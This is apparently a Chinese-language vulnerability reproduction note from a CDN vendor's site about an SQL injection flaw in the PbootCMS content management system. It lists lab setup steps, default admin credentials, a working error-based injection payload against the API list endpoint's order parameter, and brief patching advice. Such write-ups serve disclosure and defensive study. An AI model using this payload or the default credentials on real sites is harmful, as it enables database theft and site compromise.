PbootCMS SQL注入

一、漏洞描述:

PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS中存在SQL注入漏洞。

该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

后台路径:http://ip:port/admin.php 用户名密码:admin:123456。

二、复现过程:
1.访问http://ip:port,进入环境,发现需要获取授权码

 

2.进入网站,输入域名获取授权码

 

3.然后进入网站后台

后台路径:http://ip:port/admin.php

用户名密码:admin:123456

 

4.输入域名授权码并提交

 

5.将API启用

 

6.再次访问网站,已经可以正常访问
7.构造payload
/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20user())),1))%20%23

借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件; 修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;数据库被恶意操作;服务器被远程控制,被安装后门。

 
三、修复建议:
1.打补丁。
2.升级版本。

原创文章,作者:速盾高防cdn,如若转载,请注明出处:https://www.sudun.com/ask/82907.html

(0)
速盾高防cdn的头像速盾高防cdn
上一篇 2024年5月31日 下午5:33
下一篇 2024年5月31日 下午5:49

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注